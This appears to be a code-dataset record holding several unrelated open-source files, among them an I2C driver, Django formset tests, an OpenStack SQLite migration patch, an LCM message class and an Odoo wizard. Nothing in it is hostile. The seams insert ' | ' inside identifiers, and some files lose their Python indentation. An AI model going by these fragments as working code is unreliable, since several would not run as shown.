if bogusEntries:
return S_ERROR( "Some files or directories don't exist :\n\t%s" % "\n\t".join( bogusEntries ) )
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bul | kId = "%s.tar" % bulkId
retVal = self._sendTransferHeader( "BulkFromClient", ( bulkId, token, bulkSize ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper = FileHelper( transport )
retVal = fileHelper.bulkToNetwork( fileList, compr | ess, onthefly )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def receiveBulk( self, destDir, bulkId, token = "", compress = True ):
"""
Receive a bulk of files from server
:type destDir : list of ( string / file descriptor / file object )
:param destDir : Files to receive from server
:type bulkId : any
:param bulkId : Identification of the files being received
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:return : S_OK/S_ERROR
"""
if not os.path.isdir( destDir ):
return S_ERROR( "%s is not a directory for bulk receival" % destDir )
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bulkId = "%s.tar" % bulkId
retVal = self._sendTransferHeader( "BulkToClient", ( bulkId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
fileHelper = FileHelper( transport )
retVal = fileHelper.networkToBulk( destDir, compress )
if not retVal[ 'OK' ]:
return retVal
retVal = transport.receiveData()
return retVal
finally:
self._disconnect( trid )
def listBulk( self, bulkId, token = "", compress = True ):
"""
List the contents of a bulk
:type bulkId : any
:param bulkId : Identification of the bulk to list
:type token : string
:param token : Token for the bulk
:type compress : boolean
:param compress : Enable compression for the bulk. By default its True
:return : S_OK/S_ERROR
"""
if compress:
bulkId = "%s.tar.bz2" % bulkId
else:
bulkId = "%s.tar" % bulkId
trid = None
retVal = self._sendTransferHeader( "ListBulk", ( bulkId, token ) )
if not retVal[ 'OK' ]:
return retVal
trid, transport = retVal[ 'Value' ]
try:
response = transport.receiveData( 1048576 )
return response
finally:
self._disconnect( trid )
|
adafruit/Adafruit_Python_GPIO | Adafruit_GPIO/I2C.py | Python | mit | 9,083 | 0.002752 | # Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
# Based on Adafruit_I2C.py created by Kevin Townsend.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import os
import subprocess
import Adafruit_GPIO.Platform as Platform
def reverseByteOrder(data):
    """DEPRECATED: See https://github.com/adafruit/Adafruit_Python_GPIO/issues/48"""
    # Unconditionally refuse to run; the historical implementation was removed.
    raise RuntimeError('reverseByteOrder is deprecated! See: https://github.com/adafruit/Adafruit_Python_GPIO/issues/48')
def get_default_bus():
    """Return the default bus number based on the device platform.  For a
    Raspberry Pi either bus 0 or 1 (based on the Pi revision) will be returned.
    For a Beaglebone Black the first user accessible bus, 1, will be returned.

    Raises RuntimeError when the platform cannot be identified.
    """
    plat = Platform.platform_detect()
    if plat == Platform.RASPBERRY_PI:
        # Revision 1 Pis expose I2C on bus 0; all later revisions use bus 1.
        return 0 if Platform.pi_revision() == 1 else 1
    if plat == Platform.BEAGLEBONE_BLACK:
        # First user accessible bus (P9_19 and P9_20).
        return 1
    raise RuntimeError('Could not determine default I2C bus for platform.')
def get_i2c_device(address, busnum=None, i2c_interface=None, **kwargs):
    """Return an I2C Device for the specified address on the specified bus.
    When *busnum* is None the platform's default bus is auto-detected.
    """
    bus = get_default_bus() if busnum is None else busnum
    return Device(address, bus, i2c_interface, **kwargs)
def require_repeated_start():
    """Enable repeated start conditions for I2C register reads.  This is the
    normal behavior for I2C, however on some platforms like the Raspberry Pi
    there are bugs which disable repeated starts unless explicitly enabled with
    this function.  See this thread for more details:
      http://www.raspberrypi.org/forums/viewtopic.php?f=44&t=15840
    """
    plat = Platform.platform_detect()
    if plat == Platform.RASPBERRY_PI and os.path.exists('/sys/module/i2c_bcm2708/parameters/combined'):
        # On the Raspberry Pi there is a bug where register reads don't send a
        # repeated start condition like the kernel smbus I2C driver functions
        # define.  As a workaround this bit in the BCM2708 driver sysfs tree can
        # be changed to enable I2C repeated starts.
        # NOTE(review): shell=True is safe here only because both command
        # strings are hard-coded; writing the sysfs node requires root.
        subprocess.check_call('chmod 666 /sys/module/i2c_bcm2708/parameters/combined', shell=True)
        subprocess.check_call('echo -n 1 > /sys/module/i2c_bcm2708/parameters/combined', shell=True)
    # Other platforms are a no-op because they (presumably) have the correct
    # behavior and send repeated starts.
class Device(object):
"""Class for communicating with an I2C device using the adafruit-pureio pure
python smbus library, or other smbus compatible I2C interface. Allows reading
and writing 8-bit, 16-bit, and byte array values to registers
on the device."""
def __init__(self, address, busnum, i2c_interface=None):
"""Create an instance of the I2C device at the specified address on the
specified I2C bus number."""
self._address = address
if i2c_interface is None:
# Use pure python I2C interface if none is specified.
import Adafruit_PureIO.smbus
self._bus = Adafruit_PureIO.smbus.SMBus(busnum)
else:
# Otherwise use the provided class to create an smbus interface.
self._bus = i2c_interface(busnum)
self._logger = logging.getLogger('Adafruit_I2C.Device.Bus.{0}.Address.{1:#0X}' \
.format(busnum, address))
def writeRaw8(self, value):
"""Write an 8-bit value on the bus (without register)."""
value = value & 0xFF
self._bus.write_byte(self._address, value)
self._logger.debug("Wrote 0x%02X",
value)
def write8(self, register, value):
"""Write an 8-bit value to the specified register."""
value = value & 0xFF
self._bus.write_byte_data(self._address, register, value)
self._logger.debug("Wrote 0x%02X to register 0x%02X",
value, register)
def write16(self, register, value):
"""Write a 16-bit value to the specified register."""
value = value & 0xFFFF
self._bus.write_word_data(self._address, register, value)
self._logger.debug("Wrote 0x%04X to register pair 0x%02X, 0x%02X",
value, register, register+1)
def writeList(self, register, data):
"""Write bytes to the specified register."""
self._bus.write_i2c_block_data(self._address, register, data)
self._logger.debug("Wrote to register 0x%02X: %s",
register, data)
def readList(self, register, length):
"""Read a length number of bytes from the specified register. Results
will be returned as a bytearray."""
results = self._bus.read_i2c_block_data(self._address, register, length)
self._logger.debug("Read the following from register 0x%02X: %s",
register, results)
return results
def readRaw8(self):
"""Read an 8-bit value on the bus (without register)."""
result = self._bus.read_byte(self._address) & 0xFF
self._logger.debug("Read 0x%02X",
result)
return result
def readU8(self, register):
"""Read an unsigned byte from the specified register."""
result = self._bus.read_byte_data(self._address, register) & 0xFF
| self._logger.debug("Read 0x%02X from register 0x%02X",
result, register)
return result
def readS8(self | , register):
"""Read a signed byte from the specified register."""
result = self.readU8(register)
if result > 127:
result -= 256
return result
def readU16(self, register, little_endian=True):
"""Read an unsigned 16-bit value from the specified register, with the
specified endianness (default little endian, or least significant byte
first)."""
result = self._bus.read_word_data(self._address,register) & 0xFFFF
self._logger.debug("Read 0x%04X from register pair 0x%02X, 0x%02X",
result, register, register+1)
# Swap bytes if using big endian because read_word_data assumes little
# endian on ARM (little endian) systems.
if not little_endian:
result = ((result << 8) & 0xFF00) + (result >> 8)
return result
def readS16(self, register, little_endian=True):
"""Read a signed 16-bit value from the specified register, with the
specified endianness (default little endian, or least significant byte
first)."""
result = self.readU16(regis |
Raekkeri/django-formsettesthelpers | src/formsettesthelpers/tests.py | Python | mit | 4,321 | 0.000463 | from django.test import TestCase
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.forms.models import modelformset_factory
from django.forms.formsets import formset_factory
from formsettesthelpers import *
from formsettesthelpers.test_app.forms import (
UserFormSet,
PersonFormSet,
PersonForm,
)
class UsageTest(TestCase):
    def test_demonstration(self):
        """Walk through the documented ModelFormSetHelper workflow."""
        from django.forms.models import modelformset_factory
        # A formset one could plausibly use in a view.
        FormSet = modelformset_factory(User, fields=('username', 'email'))
        # Testing such a view requires a formset data dict to POST to it.
        helper = ModelFormSetHelper(FormSet)
        data = helper.generate([
            {'username': 'admin', 'email': 'admin@example.com'},
            {'username': 'user1', 'email': 'userer@example.com'},
        ], total_forms=2)
        # `data` now holds the formset management and per-form fields, e.g.
        # form-INITIAL_FORMS, form-1-username, form-1-email, ...
        self.assertEquals(data['form-1-username'], 'user1')
        # The test_app application ships a matching view, so exercise it.
        self.client.post(reverse('modelformset'), data)
        self.assertEquals(User.objects.count(), 2)
        self.assertEquals(User.objects.get(username='admin').email,
                          'admin@example.com')
        self.assertEquals(User.objects.get(username='user1').email,
                          'userer@example.com')
class BasicFormsetTestSkeleton(object):
    """Shared test cases mixed into both the formset and modelformset suites.

    Subclasses supply helper_class, formset_class, formset_class_zero_extra,
    two_forms_data, single_list_data and view_name.
    """
    def setUp(self):
        self.fh = self.helper_class(self.formset_class)

    def _post(self, view, data):
        # Single place for the POST-to-view dance shared by every test.
        return self.client.post(reverse(view), data)

    def test_valid(self):
        data = self.fh.generate(self.two_forms_data, total_forms=2)
        self.assertEquals(self._post(self.view_name, data).content, 'Is valid')

    def test_to_dict(self):
        data = self.fh.generate(self.single_list_data, total_forms=1)
        self.assertEquals(self._post(self.view_name, data).content, 'Is valid')

    def test_prefixed(self):
        helper = self.helper_class(self.formset_class, prefix='humans')
        data = helper.generate(self.two_forms_data, total_forms=2)
        self.assertEquals(
            self._post('prefixed_%s' % self.view_name, data).content,
            'Is valid')

    def test_extra_is_zero(self):
        helper = self.helper_class(self.formset_class_zero_extra)
        data = helper.generate(self.two_forms_data, total_forms=2)
        self.assertEquals(self._post(self.view_name, data).content, 'Is valid')
class TestModelFormSet(BasicFormsetTestSkeleton, TestCase):
    """Run the shared skeleton against a model formset and verify that the
    posted forms are persisted as User rows."""
    helper_class = ModelFormSetHelper
    formset_class = UserFormSet
    formset_class_zero_extra = modelformset_factory(
        User, fields=('username', 'email', 'is_staff'), extra=0)
    two_forms_data = [
        {'username': 'user1', 'email': 'e@mail.com'},
        {'username': 'user2', 'email': 'e2@mail.com'},
    ]
    single_list_data = [['justin', 'j@mail.org']]
    view_name = 'modelformset'

    def _assert_user_count(self, expected):
        # Every valid POST should have saved its forms to the database.
        self.assertEquals(User.objects.count(), expected)

    def test_valid(self):
        super(TestModelFormSet, self).test_valid()
        self._assert_user_count(2)

    def test_to_dict(self):
        super(TestModelFormSet, self).test_to_dict()
        self._assert_user_count(1)

    def test_prefixed(self):
        super(TestModelFormSet, self).test_prefixed()
        self._assert_user_count(2)

    def test_extra_is_zero(self):
        super(TestModelFormSet, self).test_extra_is_zero()
        self._assert_user_count(2)
class TestFormSet(BasicFormsetTestSkeleton, TestCase):
    """Run the shared skeleton against a plain (non-model) PersonForm formset;
    unlike TestModelFormSet there are no database assertions here."""
    helper_class = FormSetHelper
    formset_class = PersonFormSet
    formset_class_zero_extra = formset_factory(PersonForm, extra=0)
    # Fixtures consumed by the skeleton's tests.
    two_forms_data = [
        {'name': 'Janelle', 'slug': 'j1', 'age': 24},
        {'name': 'Joe', 'slug': 'j2', 'age': 25},
    ]
    single_list_data = [['Max', 'max', 42]]
    view_name = 'formset'
|
hockeybuggy/bigcommerce-api-python | bigcommerce/resources/banners.py | Python | mit | 218 | 0 | from .base import *
class Banners(ListableApiResource, CreateableApiResource,
              UpdateableApiResource, DeleteableApiResource,
              CollectionDeleteableApiResource):
    """API resource for the 'banners' collection; the mixin bases provide
    list/create/update/delete plus collection-wide delete."""
    resource_name = 'banners'
|
zhusz/ICCV17-fashionGAN | language/test_te.py | Python | bsd-3-clause | 2,918 | 0.002056 | import numpy as np
import sys
from random import randint
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from scipy.io import loadmat
from scipy.io import savemat
# Load the benchmark .mat file and promote every MATLAB variable in it to a
# module-level name (used later: codeJ, cate_new, color_, gender_, sleeve_).
mat = loadmat('../data_release/benchmark/language_original.mat')
for k, v in mat.iteritems():
    exec(k + " = mat['" + k + "']")
# Model/benchmark dimensions.
dim_voc = 539  # vocabulary size (one-hot input width)
bsz = 1  # batch size: one description at a time
m = 78979  # number of benchmark samples
dim_h = 100  # RNN hidden size
dim_cate_new = 19  # number of category classes
dim_color = 17  # number of color classes
dim_gender = 2  # number of gender classes
dim_sleeve = 4  # number of sleeve classes
num_layers = 2  # stacked RNN layers
# Re-pack the 1-based MATLAB labels as 0-based class-index tensors.
data_cate_new = torch.IntTensor(m, 1)
data_color = torch.IntTensor(m, 1)
data_gender = torch.IntTensor(m, 1)
data_sleeve = torch.IntTensor(m, 1)
for i in range(m):
    data_cate_new[i][0] = int(cate_new[i][0] - 1)
    data_color[i][0] = int(color_[i][0] - 1)
    # NOTE(review): gender is not shifted by -1 like the other labels --
    # presumably already 0-based in the .mat file; confirm against the data.
    data_gender[i][0] = int(gender_[i][0])
    data_sleeve[i][0] = int(sleeve_[i][0] - 1)
class define_network(nn.Module):
    """Sentence encoder: a stacked RNN over one-hot tokens whose final hidden
    state feeds four linear classification heads (category, color, gender,
    sleeve)."""

    def __init__(self):
        super(define_network, self).__init__()
        self.rnn = nn.RNN(dim_voc, dim_h, num_layers)
        self.net_cate_new = nn.Linear(dim_h, dim_cate_new)
        self.net_color = nn.Linear(dim_h, dim_color)
        self.net_gender = nn.Linear(dim_h, dim_gender)
        self.net_sleeve = nn.Linear(dim_h, dim_sleeve)

    def forward(self, x):
        # Zero initial hidden state, allocated on the GPU.
        initial = Variable(torch.zeros(num_layers, bsz, dim_h).cuda())
        _, hidden = self.rnn(x, initial)
        # The top layer's final hidden state serves as the embedding.
        embedding = hidden[-1]
        return (embedding,
                self.net_cate_new(embedding),
                self.net_color(embedding),
                self.net_gender(embedding),
                self.net_sleeve(embedding))
# Build the encoder, restore the trained weights and switch to eval mode.
model = define_network()
model.cuda()
model.load_state_dict(torch.load('rnn_latest.pth'))
# NOTE(review): criterion and the cuda_label_* tensors are created but never
# used below -- they look like leftovers from the training script.
criterion = nn.CrossEntropyLoss().cuda()
cuda_label_cate_new = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_color = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_gender = Variable(torch.LongTensor(bsz).zero_().cuda())
cuda_label_sleeve = Variable(torch.LongTensor(bsz).zero_().cuda())
model.eval()
# Per-sample outputs: hidden-state embedding plus the four head outputs.
test_hn2 = np.zeros((m, dim_h))
test_cate_new = np.zeros((m, dim_cate_new))
test_color = np.zeros((m, dim_color))
test_gender = np.zeros((m, dim_gender))
test_sleeve = np.zeros((m, dim_sleeve))
for sample_id in range(m):
    if sample_id % 1000 == 1:
        print(sample_id)  # progress indicator
    # codeJ entries appear to be 1-based token index sequences -- confirm.
    c = codeJ[sample_id][0]
    l = len(c)
    # One-hot encode the sequence: (seq_len, batch=1, vocab).
    cuda_c_onehot = torch.zeros(l, bsz, dim_voc).cuda()
    for i in range(l):
        cuda_c_onehot[i][0][int(c[i][0]-1)] = 1
    cuda_c_onehot = Variable(cuda_c_onehot)
    hn2, y_cate_new, y_color, y_gender, y_sleeve = model(cuda_c_onehot)
    test_hn2[sample_id] = hn2.data[0].cpu().numpy()
    test_cate_new[sample_id] = y_cate_new.data[0].cpu().numpy()
    test_color[sample_id] = y_color.data[0].cpu().numpy()
    test_gender[sample_id] = y_gender.data[0].cpu().numpy()
    test_sleeve[sample_id] = y_sleeve.data[0].cpu().numpy()
# Only the embeddings are exported; the head outputs stay in memory.
result = {"hn2":test_hn2}
savemat("encode_hn2_rnn_100_2_full.mat", result)
|
gaolichuang/py-essential | essential/db/sqlalchemy/migration.py | Python | apache-2.0 | 10,186 | 0.000393 | # coding: utf-8
#
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Base on code in migrate/changeset/databases/sqlite.py which is under
# the following license:
#
# The MIT License
#
# Copyright (c) 2009 Evan Rosson, Jan Dittberner, Domen Kožar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import os
import re
from migrate.changeset import ansisql
from migrate.changeset.databases import sqlite
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
import sqlalchemy
from sqlalchemy.schema import UniqueConstraint
from essential.db import exception
from essential.gettextutils import _
def _get_unique_constraints(self, table):
    """Retrieve information about existing unique constraints of the table

    This feature is needed for _recreate_table() to work properly.
    Unfortunately, it's not available in sqlalchemy 0.7.x/0.8.x.

    :param table: reflected SQLAlchemy Table (SQLite backend)
    :returns: list of UniqueConstraint objects parsed out of the table's
              original CREATE TABLE statement stored in sqlite_master
    """
    data = table.metadata.bind.execute(
        """SELECT sql
           FROM sqlite_master
           WHERE
               type='table' AND
               name=:table_name""",
        table_name=table.name
    ).fetchone()[0]

    # Raw string: '\w' and '\(' are invalid escape sequences in a normal
    # string literal (DeprecationWarning, eventually a SyntaxError).
    UNIQUE_PATTERN = r"CONSTRAINT (\w+) UNIQUE \(([^\)]+)\)"
    return [
        UniqueConstraint(
            *[getattr(table.columns, c.strip(' "')) for c in cols.split(",")],
            name=name
        )
        for name, cols in re.findall(UNIQUE_PATTERN, data)
    ]
def _recreate_table(self, table, column=None, delta=None, omit_uniques=None):
    """Recreate the table properly
    Unlike the corresponding original method of sqlalchemy-migrate this one
    doesn't drop existing unique constraints when creating a new one.

    :param table: SQLAlchemy Table to rebuild
    :param column: column being added/dropped (forwarded to _modify_table)
    :param delta: column alteration delta (forwarded to _modify_table)
    :param omit_uniques: names of unique constraints to leave out of the
                         rebuilt table -- this is how a constraint is dropped
    """
    table_name = self.preparer.format_table(table)
    # we remove all indexes so as not to have
    # problems during copy and re-create
    for index in table.indexes:
        index.drop()
    # reflect existing unique constraints
    for uc in self._get_unique_constraints(table):
        table.append_constraint(uc)
    # omit given unique constraints when creating a new table if required
    table.constraints = set([
        cons for cons in table.constraints
        if omit_uniques is None or cons.name not in omit_uniques
    ])
    # SQLite cannot ALTER in place: rename the old table aside, create the
    # new schema, copy the rows back, then drop the renamed original.
    self.append('ALTER TABLE %s RENAME TO migration_tmp' % table_name)
    self.execute()
    insertion_string = self._modify_table(table, column, delta)
    table.create(bind=self.connection)
    self.append(insertion_string % {'table_name': table_name})
    self.execute()
    self.append('DROP TABLE migration_tmp')
    self.execute()
def _visit_migrate_unique_constraint(self, *p, **k):
"""Drop the given unique constraint
The corresponding original method of sqlalchemy-migrate just
raises NotImplemented error
"""
self.recreate_table(p[0].table, omit_uniques=[p[0].name])
def patch_migrate():
    """A workaround for SQLite's inability to alter things
    SQLite abilities to alter tables are very limited (please read
    http://www.sqlite.org/lang_altertable.html for more details).
    E. g. one can't drop a column or a constraint in SQLite. The
    workaround for this is to recreate the original table omitting
    the corresponding constraint (or column).
    sqlalchemy-migrate library has recreate_table() method that
    implements this workaround, but it does it wrong:
    - information about unique constraints of a table is not retrieved,
      so a migration adding a second unique constraint silently loses
      the first one
    - dropping of unique constraints is not supported at all
    The proper way to fix this is to provide a pull-request to
    sqlalchemy-migrate, but the project seems to be dead. So we
    can go on with monkey-patching of the lib at least for now.
    """
    # Make recreate_table() keep the unique constraints it wasn't asked to drop.
    sqlite.SQLiteHelper.recreate_table = _recreate_table
    sqlite.SQLiteHelper._get_unique_constraints = _get_unique_constraints
    # Teach the constraint dropper how to drop unique constraints, and give it
    # the base classes required to regenerate the table.
    dropper = sqlite.SQLiteConstraintDropper
    dropper.visit_migrate_unique_constraint = _visit_migrate_unique_constraint
    dropper.__bases__ = (ansisql.ANSIColumnDropper,
                         sqlite.SQLiteConstraintGenerator)
def db_sync(engine, abs_path, version=None, init_version=0, sanity_check=True):
    """Upgrade or downgrade a database.
    Function runs the upgrade() or downgrade() functions in change scripts.
    :param engine:       SQLAlchemy engine instance for a given database
    :param abs_path:     Absolute path to migrate repository.
    :param version:      Database will upgrade/downgrade until this version.
                         If None - database will update to the latest
                         available version.
    :param init_version: Initial database version
    :param sanity_check: Require schema sanity checking for all tables
    """
    if version is not None:
        try:
            version = int(version)
        except ValueError:
            raise exception.DbMigrationError(
                message=_("version should be an integer"))

    current_version = db_version(engine, abs_path, init_version)
    repository = _find_migrate_repo(abs_path)
    if sanity_check:
        _db_schema_sanity_check(engine)

    # No explicit target, or a target ahead of us: upgrade; otherwise go back.
    if version is None or version > current_version:
        return versioning_api.upgrade(engine, repository, version)
    return versioning_api.downgrade(engine, repository, version)
def _db_schema_sanity_check(engine):
"""Ensure all database tables were created with required parameters.
:param engine: SQLAlchemy engine instance for a given database
"""
if engine.name == 'mysql':
onlyutf8_sql = ('SELECT TABLE_NAME,TABLE_COLLATION '
'from information_schema.TABLES '
'where TABLE_SCHEMA=%s and '
'TABLE_COLLATION NOT LIKE "%%utf8%%"')
table_names = [res[0] for res in engine.execute(onlyutf8_sql,
engine.url.database)]
if len(table_names) > 0:
raise ValueError(_('Tables "%s" have non utf8 collation, '
|
iitml/AL | front_end/gui/plot_vals.py | Python | gpl-2.0 | 10 | 0 | val | s = {} | |
pioneers/topgear | python/forseti2/xbox_joystick_state.py | Python | apache-2.0 | 2,436 | 0.007389 | """LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
import cStringIO as StringIO
import struct
import header
class xbox_joystick_state(object):
    """LCM message: Xbox controller state (6 float axes + 11 buttons).
    Auto-generated by lcm-gen (see the file header) -- do not hand-edit the
    logic; regenerate from the .lcm definition instead.
    """
    __slots__ = ["header", "axes", "buttons"]
    # Button indices into self.buttons.
    A = 0
    B = 1
    X = 2
    Y = 3
    LB = 4
    RB = 5
    BACK = 6
    START = 7
    GUIDE = 8
    LSTICK = 9
    RSTICK = 10
    def __init__(self):
        self.header = None
        self.axes = [ 0.0 for dim0 in range(6) ]
        self.buttons = [ False for dim0 in range(11) ]
    def encode(self):
        # Serialized form: 8-byte type fingerprint followed by the payload.
        buf = StringIO.StringIO()
        buf.write(xbox_joystick_state._get_packed_fingerprint())
        self._encode_one(buf)
        return buf.getvalue()
    def _encode_one(self, buf):
        assert self.header._get_packed_fingerprint() == header.header._get_packed_fingerprint()
        self.header._encode_one(buf)
        # 6 big-endian floats, then 11 signed bytes (booleans).
        buf.write(struct.pack('>6f', *self.axes[:6]))
        buf.write(struct.pack('>11b', *self.buttons[:11]))
    def decode(data):
        # Accepts raw bytes or a file-like object; verifies the fingerprint.
        if hasattr(data, 'read'):
            buf = data
        else:
            buf = StringIO.StringIO(data)
        if buf.read(8) != xbox_joystick_state._get_packed_fingerprint():
            raise ValueError("Decode error")
        return xbox_joystick_state._decode_one(buf)
    decode = staticmethod(decode)
    def _decode_one(buf):
        self = xbox_joystick_state()
        self.header = header.header._decode_one(buf)
        self.axes = struct.unpack('>6f', buf.read(24))
        self.buttons = struct.unpack('>11b', buf.read(11))
        return self
    _decode_one = staticmethod(_decode_one)
    _hash = None
    def _get_hash_recursive(parents):
        # Type fingerprint: fold in member-type hashes, rotate left one bit.
        if xbox_joystick_state in parents: return 0
        newparents = parents + [xbox_joystick_state]
        tmphash = (0xde0322355bddf3cb+ header.header._get_hash_recursive(newparents)) & 0xffffffffffffffff
        tmphash = (((tmphash<<1)&0xffffffffffffffff) + (tmphash>>63)) & 0xffffffffffffffff
        return tmphash
    _get_hash_recursive = staticmethod(_get_hash_recursive)
    _packed_fingerprint = None
    def _get_packed_fingerprint():
        # Cached big-endian 64-bit packing of the recursive hash.
        if xbox_joystick_state._packed_fingerprint is None:
            xbox_joystick_state._packed_fingerprint = struct.pack(">Q", xbox_joystick_state._get_hash_recursive([]))
        return xbox_joystick_state._packed_fingerprint
    _get_packed_fingerprint = staticmethod(_get_packed_fingerprint)
|
avanzosc/event-wip | sale_order_create_event_hour/wizard/wiz_event_append_assistant.py | Python | agpl-3.0 | 3,966 | 0 | # -*- coding: utf-8 -*-
# (c) 2016 Alfredo de la Fuente - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from openerp import fields, models, api
from openerp.addons.event_track_assistant._common import\
_convert_to_utc_date, _convert_to_local_date, _convert_time_to_float
date2string = fields.Date.to_string
datetime2string = fields.Datetime.to_string
str2datetime = fields.Datetime.from_string
class WizEventAppendAssistant(models.TransientModel):
    """Hour-aware extension of the event append-assistant wizard.
    Adds an hour type plus start/end times (floats, hours in the current
    user's timezone) and folds them into the registration dates it
    creates or updates.
    """
    _inherit = 'wiz.event.append.assistant'
    type_hour = fields.Many2one(
        comodel_name='hr.type.hour', string='Type hour')
    start_time = fields.Float(string='Start time', default=0.0)
    end_time = fields.Float(string='End time', default=0.0)
    @api.model
    def default_get(self, var_fields):
        # Seed start/end times from the wizard's min/max date bounds,
        # expressed in the current user's timezone.
        tz = self.env.user.tz
        res = super(WizEventAppendAssistant, self).default_get(var_fields)
        res.update({
            'start_time': _convert_time_to_float(
                _convert_to_utc_date(res.get('min_from_date'), tz=tz), tz=tz),
            'end_time': _convert_time_to_float(
                _convert_to_utc_date(res.get('max_to_date'), tz=tz), tz=tz),
        })
        return res
    @api.multi
    @api.onchange('from_date', 'start_time', 'to_date', 'end_time', 'partner')
    def onchange_dates_and_partner(self):
        # Re-trigger the parent onchange when the time fields change too;
        # the extra trigger fields are the point of this override.
        self.ensure_one()
        res = super(WizEventAppendAssistant, self).onchange_dates_and_partner()
        return res
    def revert_dates(self):
        # After the parent resets the dates, recompute the time fields from
        # the (possibly restored) min/max bounds.
        tz = self.env.user.tz
        super(WizEventAppendAssistant, self).revert_dates()
        self.start_time = _convert_time_to_float(_convert_to_utc_date(
            self.min_from_date, tz=tz), tz=tz)
        self.end_time = _convert_time_to_float(_convert_to_utc_date(
            self.max_to_date, tz=tz), tz=tz)
    def _update_registration_start_date(self, registration):
        super(WizEventAppendAssistant, self)._update_registration_start_date(
            registration)
        reg_date_start = str2datetime(registration.date_start)
        if self.start_time:
            # Combine the wizard date with the start time (stored in UTC) and
            # write it only when it actually differs.
            wiz_from_date = _convert_to_utc_date(
                self.from_date, time=self.start_time, tz=self.env.user.tz)
            if wiz_from_date != reg_date_start:
                registration.date_start = wiz_from_date
    def _update_registration_date_end(self, registration):
        super(WizEventAppendAssistant, self)._update_registration_date_end(
            registration)
        reg_date_end = str2datetime(registration.date_end)
        if self.end_time:
            wiz_to_date = _convert_to_utc_date(
                self.to_date, time=self.end_time, tz=self.env.user.tz)
            if wiz_to_date != reg_date_end:
                registration.date_end = wiz_to_date
    def _prepare_registration_data(self, event):
        vals = super(WizEventAppendAssistant,
                     self)._prepare_registration_data(event)
        # Rebuild start/end as local dates + wizard times, then clamp both to
        # the event's own begin/end window.
        date_start = _convert_to_local_date(self.from_date).date()
        date_start = _convert_to_utc_date(
            date_start, time=self.start_time, tz=self.env.user.tz)
        date_end = _convert_to_local_date(self.to_date).date()
        date_end = _convert_to_utc_date(
            date_end, time=self.end_time, tz=self.env.user.tz)
        vals.update({
            'date_start': event.date_begin
            if datetime2string(date_start) < event.date_begin else date_start,
            'date_end': event.date_end
            if datetime2string(date_end) > event.date_end else date_end,
        })
        return vals
    def _calc_dates_for_search_track(self, from_date, to_date):
        # Widen the control window with the wizard times; with no end time
        # set, cover the whole day (0.0 .. 24.0).
        super(WizEventAppendAssistant,
              self)._calc_dates_for_search_track(from_date, to_date)
        from_date = self._prepare_date_for_control(
            from_date, time=self.start_time or 0.0)
        to_date = self._prepare_date_for_control(
            to_date, time=self.end_time or 24.0)
        return from_date, to_date
|
harvard-lil/nuremberg | nuremberg/transcripts/migrations/0002_transcriptpage_updated_at.py | Python | mit | 619 | 0.001616 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-06-16 22:52
from __future__ import unicode_literals
import datetime
from d | jango.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated (Django 1.9.6): add TranscriptPage.updated_at.
    The one-off datetime default only back-fills existing rows
